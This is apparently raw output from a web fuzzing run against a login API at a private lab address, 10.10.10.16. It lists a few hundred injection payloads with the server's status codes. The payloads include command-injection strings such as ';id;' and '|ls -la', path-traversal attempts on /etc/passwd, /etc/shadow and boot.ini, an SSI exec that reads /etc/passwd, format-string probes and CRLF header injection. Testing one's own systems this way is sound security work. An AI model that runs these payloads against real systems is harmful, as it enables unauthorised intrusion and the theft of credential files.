Target: http://10.10.10.16/api/login
Total requests: 468
==============================================================================================================================================
ID    C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Payload    
==============================================================================================================================================
00015:  0.106s   C=00015:  C=200      0 L	       2 W	     21 Ch                                                                              "-268435455"
00031:  0.106s   C=00031:  C=200      0 L	       2 W	     21 Ch                                                                              "\00\00\00"
00001:  0.107s   C=00001:  C=200      0 L	       2 W	     21 Ch                                                                              "A"
00003:  0.108s   C=00003:  C=200      0 L	       2 W	     21 Ch                                                                              "FALSE"
00007:  0.108s   C=00007:  C=200      0 L	       2 W	     21 Ch                                                                              "-1"
00036:  0.108s   C=00036:  C=400      0 L	       2 W	     21 Ch                                                                              ";id;"
00038:  0.108s   C=00038:  C=400      0 L	       2 W	     21 Ch                                                                              ";netstat -a;"
00040:  0.108s   C=00040:  C=200      0 L	       2 W	     21 Ch                                                                              "\"blah"
00037:  0.108s   C=00037:  C=400      0 L	       2 W	     21 Ch                                                                              ";read;"
00039:  0.108s   C=00039:  C=400      0 L	       2 W	     21 Ch                                                                              "\nnetstat -a%\n"
00035:  0.052s   C=00035:  C=200      0 L	       2 W	     21 Ch                                                                              "`dir`"
00034:  0.051s   C=00034:  C=200      0 L	       2 W	     21 Ch                                                                              "`id`"
00033:  0.051s   C=00033:  C=200      0 L	       2 W	     21 Ch                                                                              "$NULL"
00029:  0.051s   C=00029:  C=200      0 L	       2 W	     21 Ch                                                                              "\00"
00030:  0.051s   C=00030:  C=200      0 L	       2 W	     21 Ch                                                                              "\00\00"
00027:  0.052s   C=00027:  C=200      0 L	       2 W	     21 Ch                                                                              "\0\0"
00032:  0.051s   C=00032:  C=200      0 L	       2 W	     21 Ch                                                                              "$null"
00028:  0.054s   C=00028:  C=200      0 L	       2 W	     21 Ch                                                                              "\0\0\0"
00026:  0.054s   C=00026:  C=200      0 L	       2 W	     21 Ch                                                                              "\0"
00025:  0.054s   C=00025:  C=200      0 L	       2 W	     21 Ch                                                                              "+%00"
00024:  0.050s   C=00024:  C=200      0 L	       2 W	     21 Ch                                                                              "%00"
00021:  0.050s   C=00021:  C=200      0 L	       2 W	     21 Ch                                                                              "\00"
00023:  0.050s   C=00023:  C=200      0 L	       2 W	     21 Ch                                                                              "%0a"
00022:  0.050s   C=00022:  C=200      0 L	       2 W	     21 Ch                                                                              "<  script > < / script>"
00020:  0.050s   C=00020:  C=200      0 L	       2 W	     21 Ch                                                                              "\0"
00019:  0.048s   C=00019:  C=200      0 L	       2 W	     21 Ch                                                                              "null"
00018:  0.049s   C=00018:  C=200      0 L	       2 W	     21 Ch                                                                              "NULL"
00014:  0.049s   C=00014:  C=200      0 L	       2 W	     21 Ch                                                                              "268435455"
00016:  0.049s   C=00016:  C=200      0 L	       2 W	     21 Ch                                                                              "2147483647"
00017:  0.052s   C=00017:  C=200      0 L	       2 W	     21 Ch                                                                              "0xfffffff"
00011:  0.056s   C=00011:  C=200      0 L	       2 W	     21 Ch                                                                              "-2"
00005:  0.053s   C=00005:  C=200      0 L	       2 W	     21 Ch                                                                              "00"
00009:  0.055s   C=00009:  C=200      0 L	       2 W	     21 Ch                                                                              "-1.0"
00004:  0.051s   C=00004:  C=200      0 L	       2 W	     21 Ch                                                                              "0"
00013:  0.056s   C=00013:  C=200      0 L	       2 W	     21 Ch                                                                              "65536"
00006:  0.055s   C=00006:  C=200      0 L	       2 W	     21 Ch                                                                              "1"
00002:  0.053s   C=00002:  C=200      0 L	       2 W	     21 Ch                                                                              "TRUE"
00010:  0.055s   C=00010:  C=200      0 L	       2 W	     21 Ch                                                                              "2"
00008:  0.055s   C=00008:  C=200      0 L	       2 W	     21 Ch                                                                              "1.0"
00012:  0.056s   C=00012:  C=200      0 L	       2 W	     21 Ch                                                                              "-20"
00041:  0.049s   C=00041:  C=200      0 L	       2 W	     21 Ch                                                                              "|id|"
00043:  0.049s   C=00043:  C=200      0 L	       2 W	     21 Ch                                                                              "id%00"
00068:  0.049s   C=00068:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/passwd"
00047:  0.049s   C=00047:  C=200      0 L	       2 W	     21 Ch                                                                              "|dir|"
00069:  0.049s   C=00069:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/shadow%00"
00064:  0.050s   C=00064:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/hosts"
00065:  0.050s   C=00065:  C=200      0 L	       2 W	     21 Ch                                                                              "../../boot.ini"
00055:  0.049s   C=00055:  C=200      0 L	       2 W	     21 Ch                                                                              "?x=""
00066:  0.050s   C=00066:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../%2A"
00067:  0.051s   C=00067:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/passwd%00"
00062:  0.056s   C=00062:  C=400      0 L	       2 W	     21 Ch                                                                              "ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|"
00063:  0.057s   C=00063:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/hosts%00"
00058:  0.055s   C=00058:  C=200      0 L	       2 W	     21 Ch                                                                              "/index.html|id|"
00057:  0.054s   C=00057:  C=200      0 L	       2 W	     21 Ch                                                                              "?x=>"
00053:  0.052s   C=00053:  C=200      0 L	       2 W	     21 Ch                                                                              "\n/bin/ls -al\n"
00061:  0.056s   C=00061:  C=200      0 L	       2 W	     21 Ch                                                                              "/etc/shadow"
00060:  0.055s   C=00060:  C=200      0 L	       2 W	     21 Ch                                                                              "/etc/passwd"
00056:  0.054s   C=00056:  C=200      0 L	       2 W	     21 Ch                                                                              "?x=|"
00054:  0.054s   C=00054:  C=200      0 L	       2 W	     21 Ch                                                                              "?x="
00059:  0.055s   C=00059:  C=200      0 L	       2 W	     21 Ch                                                                              "/boot.ini"
00052:  0.050s   C=00052:  C=200      0 L	       2 W	     21 Ch                                                                              "|/bin/ls -al"
00045:  0.051s   C=00045:  C=200      0 L	       2 W	     21 Ch                                                                              "|id"
00049:  0.050s   C=00049:  C=200      0 L	       2 W	     21 Ch                                                                              "|ls -la"
00046:  0.050s   C=00046:  C=200      0 L	       2 W	     21 Ch                                                                              "|dir"
00042:  0.051s   C=00042:  C=400      0 L	       2 W	     21 Ch                                                                              "&quot;;id&quot;"
00050:  0.049s   C=00050:  C=400      0 L	       2 W	     21 Ch                                                                              ";ls -la"
00048:  0.050s   C=00048:  C=200      0 L	       2 W	     21 Ch                                                                              "|ls"
00051:  0.050s   C=00051:  C=400      0 L	       2 W	     21 Ch                                                                              ";dir"
00044:  0.051s   C=00044:  C=200      0 L	       2 W	     21 Ch                                                                              "id%00|"
00105:  0.051s   C=00105:  C=200      0 L	       2 W	     21 Ch                                                                              "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini"
00108:  0.052s   C=00108:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../conf/server.xml"
00076:  0.053s   C=00076:  C=200      0 L	       2 W	     21 Ch                                                                              "/./././././././././././etc/shadow"
00106:  0.052s   C=00106:  C=200      0 L	       2 W	     21 Ch                                                                              "\\&apos;/bin/cat%20/etc/passwd\\&apos;"
00070:  0.103s   C=00070:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../etc/shadow"
00084:  0.052s   C=00084:  C=200      0 L	       2 W	     21 Ch                                                                              ".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow"
00107:  0.052s   C=00107:  C=200      0 L	       2 W	     21 Ch                                                                              "\\&apos;/bin/cat%20/etc/shadow\\&apos;"
00104:  0.051s   C=00104:  C=400      0 L	       2 W	     21 Ch                                                                              "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini"
00100:  0.052s   C=00100:  C=200      0 L	       2 W	     21 Ch                                                                              "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
00072:  0.054s   C=00072:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../etc/shadow^^"
00103:  0.051s   C=00103:  C=400      0 L	       2 W	     21 Ch                                                                              "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00"
00095:  0.051s   C=00095:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../etc/passwd%00.jpg"
00098:  0.051s   C=00098:  C=200      0 L	       2 W	     21 Ch                                                                              "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
00093:  0.051s   C=00093:  C=200      0 L	       2 W	     21 Ch                                                                              "%00../../../../../../etc/passwd"
00099:  0.051s   C=00099:  C=200      0 L	       2 W	     21 Ch                                                                              "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
00097:  0.051s   C=00097:  C=200      0 L	       2 W	     21 Ch                                                                              "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
00094:  0.051s   C=00094:  C=200      0 L	       2 W	     21 Ch                                                                              "%00../../../../../../etc/shadow"
00102:  0.051s   C=00102:  C=200      0 L	       2 W	     21 Ch                                                                              "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00096:  0.051s   C=00096:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../etc/passwd%00.html"
00101:  0.051s   C=00101:  C=200      0 L	       2 W	     21 Ch                                                                              "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00092:  0.051s   C=00092:  C=200      0 L	       2 W	     21 Ch                                                                              "%00/etc/shadow%00"
00091:  0.051s   C=00091:  C=200      0 L	       2 W	     21 Ch                                                                              "%00/etc/passwd%00"
00090:  0.051s   C=00090:  C=200      0 L	       2 W	     21 Ch                                                                              "%0a/bin/cat%20/etc/shadow"
00083:  0.051s   C=00083:  C=200      0 L	       2 W	     21 Ch                                                                              ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
00087:  0.051s   C=00087:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00089:  0.051s   C=00089:  C=200      0 L	       2 W	     21 Ch                                                                              "%0a/bin/cat%20/etc/passwd"
00086:  0.052s   C=00086:  C=200      0 L	       2 W	     21 Ch                                                                              "\..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00088:  0.051s   C=00088:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00085:  0.105s   C=00085:  C=200      0 L	       2 W	     21 Ch                                                                              "\..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00079:  0.051s   C=00079:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\etc\passwd"
00078:  0.051s   C=00078:  C=200      0 L	       2 W	     21 Ch                                                                              "\..\..\..\..\..\..\..\..\..\..\etc\shadow"
00071:  0.051s   C=00071:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../etc/passwd^^"
00082:  0.105s   C=00082:  C=200      0 L	       2 W	     21 Ch                                                                              "/..\../..\../..\../..\../..\../..\../etc/shadow"
00081:  0.051s   C=00081:  C=200      0 L	       2 W	     21 Ch                                                                              "/..\../..\../..\../..\../..\../..\../etc/passwd"
00074:  0.051s   C=00074:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../etc/shadow"
00075:  0.051s   C=00075:  C=200      0 L	       2 W	     21 Ch                                                                              "/./././././././././././etc/passwd"
00080:  0.051s   C=00080:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\etc\shadow"
00077:  0.052s   C=00077:  C=200      0 L	       2 W	     21 Ch                                                                              "\..\..\..\..\..\..\..\..\..\..\etc\passwd"
00073:  0.049s   C=00073:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../etc/passwd"
00123:  0.050s   C=00123:  C=200      0 L	       2 W	     21 Ch                                                                              "\..\..\..\..\..\..\..\..\..\..\boot.ini"
00139:  0.050s   C=00139:  C=200      0 L	       2 W	     21 Ch                                                                              "*"
00111:  0.051s   C=00111:  C=200      0 L	       2 W	     21 Ch                                                                              "C:\inetpub\wwwroot\global.asa"
00109:  0.049s   C=00109:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../bin/id|"
00156:  0.050s   C=00156:  C=200      0 L	       2 W	     21 Ch                                                                              "||"
00157:  0.050s   C=00157:  C=200      0 L	       2 W	     21 Ch                                                                              "`"
00158:  0.050s   C=00158:  C=200      0 L	       2 W	     21 Ch                                                                              "-"
00115:  0.050s   C=00115:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../localstart.asp"
00153:  0.050s   C=00153:  C=200      0 L	       2 W	     21 Ch                                                                              "<<"
00154:  0.050s   C=00154:  C=200      0 L	       2 W	     21 Ch                                                                              "<<<"
00155:  0.098s   C=00155:  C=200      0 L	       2 W	     21 Ch                                                                              "|"
00152:  0.050s   C=00152:  C=200      0 L	       2 W	     21 Ch                                                                              "<"
00146:  0.050s   C=00146:  C=200      0 L	       2 W	     21 Ch                                                                              "\\\\*"
00149:  0.048s   C=00149:  C=400      0 L	       2 W	     21 Ch                                                                              "&lt;"
00148:  0.048s   C=00148:  C=400      0 L	       2 W	     21 Ch                                                                              "&lt"
00150:  0.049s   C=00150:  C=400      0 L	       2 W	     21 Ch                                                                              "&LT"
00151:  0.049s   C=00151:  C=400      0 L	       2 W	     21 Ch                                                                              "&LT;"
00147:  0.048s   C=00147:  C=200      0 L	       2 W	     21 Ch                                                                              "\\\\?\\"
00145:  0.050s   C=00145:  C=200      0 L	       2 W	     21 Ch                                                                              "\\/"
00143:  0.051s   C=00143:  C=200      0 L	       2 W	     21 Ch                                                                              "\"
00144:  0.052s   C=00144:  C=200      0 L	       2 W	     21 Ch                                                                              "\\"
00142:  0.052s   C=00142:  C=200      0 L	       2 W	     21 Ch                                                                              "/"
00135:  0.051s   C=00135:  C=400      0 L	       2 W	     21 Ch                                                                              "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;"
00136:  0.052s   C=00136:  C=400      0 L	       2 W	     21 Ch                                                                              "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
00140:  0.052s   C=00140:  C=200      0 L	       2 W	     21 Ch                                                                              "}"
00141:  0.053s   C=00141:  C=400      0 L	       2 W	     21 Ch                                                                              ";"
00137:  0.052s   C=00137:  C=400      0 L	       2 W	     21 Ch                                                                              "%"
00138:  0.052s   C=00138:  C=200      0 L	       2 W	     21 Ch                                                                              "#"
00134:  0.050s   C=00134:  C=400      0 L	       2 W	     21 Ch                                                                              "/,%ENV,/"
00133:  0.049s   C=00133:  C=200      0 L	       2 W	     21 Ch                                                                              "%01%02%03%04%0a%0d%0aADSF"
00132:  0.051s   C=00132:  C=400      0 L	       2 W	     21 Ch                                                                              "!@#0%^#0##018387@#0^^**(()"
00130:  0.051s   C=00130:  C=200      0 L	       2 W	     21 Ch                                                                              "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini"
00131:  0.052s   C=00131:  C=200      0 L	       2 W	     21 Ch                                                                              "%0d%0aX-Injection-Header:%20AttackValue"
00125:  0.051s   C=00125:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\boot.ini"
00127:  0.051s   C=00127:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../boot.ini%00.jpg"
00129:  0.051s   C=00129:  C=200      0 L	       2 W	     21 Ch                                                                              "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini"
00126:  0.051s   C=00126:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../boot.ini%00.html"
00128:  0.051s   C=00128:  C=200      0 L	       2 W	     21 Ch                                                                              "/.../.../.../.../.../"
00124:  0.051s   C=00124:  C=200      0 L	       2 W	     21 Ch                                                                              "..\..\..\..\..\..\..\..\..\..\boot.ini%00"
00122:  0.051s   C=00122:  C=200      0 L	       2 W	     21 Ch                                                                              "/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
00121:  0.048s   C=00121:  C=200      0 L	       2 W	     21 Ch                                                                              "/..\../..\../..\../..\../..\../..\../boot.ini"
00120:  0.049s   C=00120:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../boot.ini"
00117:  0.051s   C=00117:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../boot.ini"
00114:  0.051s   C=00114:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../localstart.asp%00"
00116:  0.051s   C=00116:  C=200      0 L	       2 W	     21 Ch                                                                              "../../../../../../../../../../../../boot.ini%00"
00118:  0.051s   C=00118:  C=200      0 L	       2 W	     21 Ch                                                                              "/./././././././././././boot.ini"
00113:  0.051s   C=00113:  C=200      0 L	       2 W	     21 Ch                                                                              "C:\boot.ini"
00119:  0.051s   C=00119:  C=200      0 L	       2 W	     21 Ch                                                                              "/../../../../../../../../../../../boot.ini%00"
00112:  0.049s   C=00112:  C=200      0 L	       2 W	     21 Ch                                                                              "C:/boot.ini"
00161:  0.049s   C=00161:  C=200      0 L	       2 W	     21 Ch                                                                              "^'"
00110:  0.050s   C=00110:  C=200      0 L	       2 W	     21 Ch                                                                              "C:/inetpub/wwwroot/global.asa"
00159:  0.049s   C=00159:  C=200      0 L	       2 W	     21 Ch                                                                              "--"
00165:  0.050s   C=00165:  C=200      0 L	       2 W	     21 Ch                                                                              "(')"
00198:  0.051s   C=00198:  C=200      0 L	       2 W	     21 Ch                                                                              "%20|"
00197:  0.051s   C=00197:  C=200      0 L	       2 W	     21 Ch                                                                              "%20"
00173:  0.051s   C=00173:  C=200      0 L	       2 W	     21 Ch                                                                              "\t"
00196:  0.051s   C=00196:  C=200      0 L	       2 W	     21 Ch                                                                              "%2C"
00189:  0.051s   C=00189:  C=200      0 L	       2 W	     21 Ch                                                                              "%60"
00194:  0.050s   C=00194:  C=200      0 L	       2 W	     21 Ch                                                                              "/%2A"
00195:  0.050s   C=00195:  C=200      0 L	       2 W	     21 Ch                                                                              "%2A"
00193:  0.049s   C=00193:  C=200      0 L	       2 W	     21 Ch                                                                              "%00"
00192:  0.048s   C=00192:  C=200      0 L	       2 W	     21 Ch                                                                              "%7C"
00191:  0.050s   C=00191:  C=200      0 L	       2 W	     21 Ch                                                                              "%5C/"
00188:  0.049s   C=00188:  C=200      0 L	       2 W	     21 Ch                                                                              "%3C%3F"
00190:  0.049s   C=00190:  C=200      0 L	       2 W	     21 Ch                                                                              "%5C"
00186:  0.049s   C=00186:  C=200      0 L	       2 W	     21 Ch                                                                              "<?"
00187:  0.049s   C=00187:  C=200      0 L	       2 W	     21 Ch                                                                              "%3C"
00185:  0.049s   C=00185:  C=200      0 L	       2 W	     21 Ch                                                                              "%00"
00184:  0.049s   C=00184:  C=200      0 L	       2 W	     21 Ch                                                                              "%00/"
00182:  0.051s   C=00182:  C=200      0 L	       2 W	     21 Ch                                                                              "#xA#xD"
00181:  0.051s   C=00181:  C=200      0 L	       2 W	     21 Ch                                                                              "#xD#xA"
00183:  0.052s   C=00183:  C=200      0 L	       2 W	     21 Ch                                                                              "/%00/"
00180:  0.049s   C=00180:  C=200      0 L	       2 W	     21 Ch                                                                              "#xA"
00179:  0.049s   C=00179:  C=200      0 L	       2 W	     21 Ch                                                                              "#xD"
00175:  0.051s   C=00175:  C=400      0 L	       2 W	     21 Ch                                                                              "&#10;"
00177:  0.051s   C=00177:  C=400      0 L	       2 W	     21 Ch                                                                              "&#10;&#13;"
00178:  0.051s   C=00178:  C=400      0 L	       2 W	     21 Ch                                                                              "&#13;&#10;"
00176:  0.051s   C=00176:  C=400      0 L	       2 W	     21 Ch                                                                              "&#13;"
00172:  0.050s   C=00172:  C=200      0 L	       2 W	     21 Ch                                                                              "%01%02%03%04%0a%0d%0aADSF"
00170:  0.049s   C=00170:  C=200      0 L	       2 W	     21 Ch                                                                              "!'"
00174:  0.049s   C=00174:  C=200      0 L	       2 W	     21 Ch                                                                              ""\t""
00171:  0.049s   C=00171:  C=400      0 L	       2 W	     21 Ch                                                                              "!@#$%%^#$%#$@#$%$$@#$%^^**(()"
00168:  0.051s   C=00168:  C=200      0 L	       2 W	     21 Ch                                                                              "*'"
00169:  0.051s   C=00169:  C=200      0 L	       2 W	     21 Ch                                                                              "#'"
00167:  0.049s   C=00167:  C=200      0 L	       2 W	     21 Ch                                                                              "[']"
00164:  0.050s   C=00164:  C=200      0 L	       2 W	     21 Ch                                                                              "@'"
00166:  0.051s   C=00166:  C=200      0 L	       2 W	     21 Ch                                                                              "{'}"
00163:  0.051s   C=00163:  C=200      0 L	       2 W	     21 Ch                                                                              "/'"
00160:  0.050s   C=00160:  C=200      0 L	       2 W	     21 Ch                                                                              "*|"
00162:  0.050s   C=00162:  C=200      0 L	       2 W	     21 Ch                                                                              "\'"
00199:  0.050s   C=00199:  C=200      0 L	       2 W	     21 Ch                                                                              "%250a"
00201:  0.050s   C=00201:  C=200      0 L	       2 W	     21 Ch                                                                              "../"
00205:  0.052s   C=00205:  C=400      0 L	       2 W	     21 Ch                                                                              "..%bg%qf"
00229:  0.051s   C=00229:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x00003c"
00213:  0.051s   C=00213:  C=400      0 L	       2 W	     21 Ch                                                                              "&#60"
00236:  0.049s   C=00236:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x000003c;"
00234:  0.050s   C=00234:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x0003c;"
00235:  0.050s   C=00235:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x00003c;"
00233:  0.052s   C=00233:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x003c;"
00232:  0.050s   C=00232:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x03c;"
00231:  0.050s   C=00231:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x3c;"
00228:  0.050s   C=00228:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x0003c"
00225:  0.050s   C=00225:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x3c"
00226:  0.050s   C=00226:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x03c"
00230:  0.050s   C=00230:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x000003c"
00224:  0.049s   C=00224:  C=400      0 L	       2 W	     21 Ch                                                                              "&#0000060;"
00227:  0.050s   C=00227:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x003c"
00223:  0.051s   C=00223:  C=400      0 L	       2 W	     21 Ch                                                                              "&#000060;"
00222:  0.049s   C=00222:  C=400      0 L	       2 W	     21 Ch                                                                              "&#00060;"
00221:  0.053s   C=00221:  C=400      0 L	       2 W	     21 Ch                                                                              "&#0060;"
00219:  0.053s   C=00219:  C=400      0 L	       2 W	     21 Ch                                                                              "&#60;"
00220:  0.054s   C=00220:  C=400      0 L	       2 W	     21 Ch                                                                              "&#060;"
00217:  0.049s   C=00217:  C=400      0 L	       2 W	     21 Ch                                                                              "&#000060"
00216:  0.049s   C=00216:  C=400      0 L	       2 W	     21 Ch                                                                              "&#00060"
00212:  0.049s   C=00212:  C=400      0 L	       2 W	     21 Ch                                                                              "..%u2216"
00218:  0.051s   C=00218:  C=400      0 L	       2 W	     21 Ch                                                                              "&#0000060"
00215:  0.051s   C=00215:  C=400      0 L	       2 W	     21 Ch                                                                              "&#0060"
00214:  0.050s   C=00214:  C=400      0 L	       2 W	     21 Ch                                                                              "&#060"
00211:  0.051s   C=00211:  C=200      0 L	       2 W	     21 Ch                                                                              "..%25%35%63"
00210:  0.049s   C=00210:  C=400      0 L	       2 W	     21 Ch                                                                              "..%%35%63"
00209:  0.049s   C=00209:  C=200      0 L	       2 W	     21 Ch                                                                              "..%255c"
00208:  0.050s   C=00208:  C=400      0 L	       2 W	     21 Ch                                                                              "..%%35c"
00204:  0.049s   C=00204:  C=200      0 L	       2 W	     21 Ch                                                                              "..%c0%af"
00207:  0.049s   C=00207:  C=200      0 L	       2 W	     21 Ch                                                                              "..%5c"
00206:  0.049s   C=00206:  C=200      0 L	       2 W	     21 Ch                                                                              "..\"
00203:  0.051s   C=00203:  C=400      0 L	       2 W	     21 Ch                                                                              "..%u2215"
00200:  0.051s   C=00200:  C=200      0 L	       2 W	     21 Ch                                                                              "%2500"
00202:  0.050s   C=00202:  C=200      0 L	       2 W	     21 Ch                                                                              "%2e%2e%2f"
00237:  0.051s   C=00237:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X3c"
00239:  0.051s   C=00239:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X003c"
00243:  0.051s   C=00243:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X3c;"
00251:  0.050s   C=00251:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x003C"
00286:  0.050s   C=00286:  C=200      0 L	       2 W	     21 Ch                                                                              "#&apos;"
00282:  0.049s   C=00282:  C=200      0 L	       2 W	     21 Ch                                                                              "@&apos;"
00267:  0.050s   C=00267:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X3C;"
00285:  0.050s   C=00285:  C=200      0 L	       2 W	     21 Ch                                                                              "*&apos;"
00284:  0.050s   C=00284:  C=200      0 L	       2 W	     21 Ch                                                                              "[&apos;]"
00283:  0.049s   C=00283:  C=200      0 L	       2 W	     21 Ch                                                                              "{&apos;}"
00281:  0.051s   C=00281:  C=200      0 L	       2 W	     21 Ch                                                                              "^&apos;"
00279:  0.049s   C=00279:  C=200      0 L	       2 W	     21 Ch                                                                              "/&apos;"
00280:  0.050s   C=00280:  C=200      0 L	       2 W	     21 Ch                                                                              "\&apos;"
00278:  0.051s   C=00278:  C=400      0 L	       2 W	     21 Ch                                                                              "&apos;"
00276:  0.051s   C=00276:  C=200      0 L	       2 W	     21 Ch                                                                              "\u003C"
00277:  0.051s   C=00277:  C=200      0 L	       2 W	     21 Ch                                                                              "something%00html"
00275:  0.051s   C=00275:  C=200      0 L	       2 W	     21 Ch                                                                              "\u003c"
00272:  0.049s   C=00272:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X000003C;"
00274:  0.050s   C=00274:  C=200      0 L	       2 W	     21 Ch                                                                              "\x3C"
00273:  0.049s   C=00273:  C=200      0 L	       2 W	     21 Ch                                                                              "\x3c"
00271:  0.050s   C=00271:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X00003C;"
00270:  0.050s   C=00270:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X0003C;"
00269:  0.049s   C=00269:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X003C;"
00264:  0.050s   C=00264:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X0003C"
00266:  0.051s   C=00266:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X000003C"
00263:  0.050s   C=00263:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X003C"
00268:  0.051s   C=00268:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X03C;"
00262:  0.049s   C=00262:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X03C"
00265:  0.051s   C=00265:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X00003C"
00261:  0.051s   C=00261:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X3C"
00260:  0.050s   C=00260:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x000003C;"
00259:  0.048s   C=00259:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x00003C;"
00258:  0.048s   C=00258:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x0003C;"
00257:  0.048s   C=00257:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x003C;"
00255:  0.050s   C=00255:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x3C;"
00256:  0.050s   C=00256:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x03C;"
00250:  0.051s   C=00250:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x03C"
00254:  0.050s   C=00254:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x000003C"
00252:  0.051s   C=00252:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x0003C"
00253:  0.050s   C=00253:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x00003C"
00248:  0.051s   C=00248:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X000003c;"
00247:  0.051s   C=00247:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X00003c;"
00249:  0.052s   C=00249:  C=400      0 L	       2 W	     21 Ch                                                                              "&#x3C"
00246:  0.051s   C=00246:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X0003c;"
00245:  0.051s   C=00245:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X003c;"
